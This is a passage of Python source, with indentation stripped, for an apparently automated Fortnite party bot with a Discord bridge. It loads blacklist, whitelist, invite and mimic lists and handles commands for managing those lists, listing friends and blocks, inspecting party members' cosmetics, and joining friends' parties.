send(display_name,f'{l("owner")}: {name(friend)}',green,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if client.owner and data['fortnite']['click_invite']:
for owner in client.owner:
await owner.send(l("click_invite"))
lists = {
"blacklist": "blacklist",
"whitelist": "whitelist",
"otherbotlist": "botlist"
}
async def _(listuser: str) -> None:
user = client.get_user(listuser) or client.get_cache_user(listuser)
if not user:
try:
user = await client.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{data_}_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
if data_ == "blacklist" and data["fortnite"]["blacklist-autoblock"]:
try:
await user.block()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
globals()[list_].append(user.id)
for list_,data_ in lists.items():
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite'][list_]])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f"fortnite {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
lists = [
"outfitmimic",
"backpackmimic",
"pickaxemimic",
"emotemimic"
]
async def _(mimic: str) -> None:
if isinstance(data['fortnite'][mimic],str):
user = client.get_user(mimic) or client.get_cache_user(mimic)
if not user:
try:
user = await client.fetch_user(data['fortnite'][mimic])
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{mimic}_user_notfound",data['fortnite'][mimic]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
setattr(client,mimic,user.id)
if data['loglevel'] == "debug":
send(display_name,f"{mimic} {getattr(client,mimic)}",yellow,add_d=lambda x:f'```\n{x}\n```')
try:
await asyncio.gather(*[_(mimic) for mimic in lists])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def _(listuser: str) -> None:
user = client.get_user(listuser) or client.get_cache_user(listuser)
if not user:
try:
user = await client.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("invitelist_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
friend = client.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_inviteuser",listuser,commands["reload"]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not client.is_pending(user.id) and user.id != client.user.id:
try:
await client.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.invitelist.append(friend.id)
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite']['invitelist']])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f'invitelist {client.invitelist}',yellow,add_d=lambda x:f'```\n{x}\n```')
if data['fortnite']['acceptfriend']:
async def _(pending: fortnitepy.IncomingPendingFriend) -> None:
if client.acceptfriend is True:
try:
await pending.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif client.acceptfriend is False:
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await asyncio.gather(*[_(pending) for pending in client.incoming_pending_friends])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['discord']['enabled'] and dclient.isready:
dclient_user = name(dclient.user)
dclient.owner = []
for owner in data['discord']['owner']:
user = dclient.get_user(owner)
if not user:
try:
user = await dclient.fetch_user(owner)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l('error_while_requesting_userinfo'),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(dclient_user,l('discord_owner_notfound',owner),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
else:
dclient.owner.append(user)
send(dclient_user,f"{l('owner')}: {name(user)}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
lists = {
"blacklist_": "blacklist",
"whitelist_": "whitelist"
}
async def _(listuser: str) -> None:
listuser = int(listuser)
user = dclient.get_user(listuser)
if not user:
try:
user = await dclient.fetch_user(listuser)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l(f'discord_{data_}_user_notfound', listuser),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
return
globals()[list_].append(user.id)
for list_,data_ in lists.items():
await asyncio.gather(*[_(listuser) for listuser in data['discord'][data_]])
if data['loglevel'] == "debug":
send(dclient_user,f"discord {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addblacklist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addblacklist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(name).lower()) and user.id != client.user.id and user.id not in blacklist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(name) and user.id != client.user.id and user.id not in blacklist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in blacklist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', len(users)))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in blacklist:
blacklist.append(user.id)
if user.display_name:
data["fortnite"]["blacklist"].append(user.display_name)
else:
data["fortnite"]["blacklist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('blacklist')))
else:
await reply(message, client, l('already_in_list', f'{name(user)}', l('blacklist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in blacklist:
blacklist.append(user.id)
if user.display_name:
data["fortnite"]["blacklist"].append(user.display_name)
else:
data["fortnite"]["blacklist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('blacklist')))
else:
await reply(message, client, l('already_in_list', f'{name(user)}', l('blacklist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('blacklist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeblacklist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removeblacklist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in blacklist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in blacklist}
try:
user = await client.fetch_user(rawcontent)
if not user:
if user.id in blacklist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in blacklist:
blacklist.remove(user.id)
try:
data["fortnite"]["blacklist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["blacklist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', name(user), l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', name(user), l('blacklist')))
else:
await reply(message, client, l('not_list', name(user), l('blacklist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in blacklist:
blacklist.remove(user.id)
try:
data["fortnite"]["blacklist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["blacklist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', name(user), l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', name(user), l('blacklist')))
else:
await reply(message, client, l('not_list', name(user), l('blacklist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('blacklist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addwhitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addwhitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in whitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in whitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in whitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in whitelist:
whitelist.append(user.id)
if user.display_name:
data["fortnite"]["whitelist"].append(str(user.display_name))
else:
data["fortnite"]["whitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["whitelist"] = data["fortnite"]["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l('whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('whitelist')))
else:
await reply(message, client, l("already_list", name(user), l('whitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in whitelist:
whitelist.append(user.id)
if user.display_name:
data["fortnite"]["whitelist"].append(str(user.display_name))
else:
data["fortnite"]["whitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["whitelist"] = data["fortnite"]["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l('whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('whitelist')))
else:
await reply(message, client, l("already_list", name(user), l('whitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('whitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removewhitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removewhitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in whitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in whitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in whitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in whitelist:
whitelist.remove(user.id)
try:
data["whitelist"].remove(str(user.display_name))
except ValueError:
data["whitelist"].remove(user.id)
data_ = load_json("config.json")
data_["whitelist"] = data["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("whitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('whitelist')))
else:
await reply(message, client, l("not_list", name(user), l('whitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in whitelist:
whitelist.remove(user.id)
try:
data["whitelist"].remove(str(user.display_name))
except ValueError:
data["whitelist"].remove(user.id)
data_ = load_json("config.json")
data_["whitelist"] = data["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("whitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('whitelist')))
else:
await reply(message, client, l("not_list", name(user), l('whitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('whitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addinvitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addinvitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in client.invitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in client.invitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in client.invitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in client.invitelist:
client.invitelist.append(user.id)
if user.display_name:
data["fortnite"]["invitelist"].append(str(user.display_name))
else:
data["fortnite"]["invitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('invitelist')))
else:
await reply(message, client, l("already_list", name(user), l('invitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in client.invitelist:
client.invitelist.append(user.id)
if user.display_name:
data["fortnite"]["invitelist"].append(str(user.display_name))
else:
data["fortnite"]["invitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('invitelist')))
else:
await reply(message, client, l("already_list", name(user), l('invitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('invitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeinvitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removeinvitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in client.invitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in client.invitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in client.invitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in client.invitelist:
client.invitelist.remove(user.id)
try:
data["fortnite"]["invitelist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["invitelist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('invitelist')))
else:
await reply(message, client, l("not_list", name(user), l('invitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in client.invitelist:
client.invitelist.remove(user.id)
try:
data["fortnite"]["invitelist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["invitelist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('invitelist')))
else:
await reply(message, client, l("not_list", name(user), l('invitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('invitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['get']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['get']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l("user_not_in_party"))
return
send(display_name,f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if data['loglevel'] == 'debug':
send(display_name,json.dumps(member.meta.schema, indent=2),yellow,add_d=lambda x:f'```\n{x}\n```',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}')
else:
client.select[message.author.id] = {
"exec": [
"""\
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l("user_not_in_party"))
return
send(display_name,f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if data['loglevel'] == 'debug':
send(display_name,json.dumps(member.meta.schema, indent=2),yellow,add_d=lambda x:f'>>> {x}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}')""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_get_userinfo')}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['friendcount']:
try:
send(display_name,f"{l('friendcount')}: {len(client.friends)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('friendcount')}: {len(client.friends)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pendingcount']:
try:
send(display_name,f"{l('pendingcount')}: {len(client.pending_friends)}\n{l('outbound')}: {len(client.outgoing_pending_friends)}\n{l('inbound')}: {len(client.incoming_pending_friends)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('pendingcount')}: {len(client.pending_friends)}\n{l('outbound')}: {len(client.outgoing_pending_friends)}\n{l('inbound')}: {len(client.incoming_pending_friends)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blockcount']:
try:
send(display_name,f"{l('blockcount')}: {len(client.blocked_users)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('blockcount')}: {len(client.blocked_users)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['friendlist']:
try:
text = ''
for friend in client.friends:
client.add_cache(friend)
text += f'\n{name(friend)}'
send(display_name,text,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{text}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pendinglist']:
try:
outgoing = ''
incoming = ''
for pending in client.pending_friends:
client.add_cache(pending)
if pending.outgoing:
outgoing += f'\n{name(pending)}'
elif pending.incoming:
incoming += f'\n{name(pending)}'
send(display_name,f"{l('outbound')}: {outgoing}\n{l('inbound')}: {incoming}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('outbound')}: {outgoing}\n{l('inbound')}: {incoming}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blocklist']:
try:
text = ''
for block in client.blocked_users:
client.add_cache(block)
text += f'\n{name(block)}'
send(display_name,text,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{text}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['wait']:
try:
if not client.acceptinvite:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
client.acceptinvite = False
try:
client.timer_.cancel()
except AttributeError:
pass
client.timer_ = Timer(data['fortnite']['waitinterval'], client.inviteaccept)
client.timer_.start()
await reply(message, client, l('decline_invite_for', str(data['fortnite']['waitinterval'])))
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['join']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['join']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
else:
await friend.join_party()
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
else:
await friend.join_party()
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already_or_offline'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
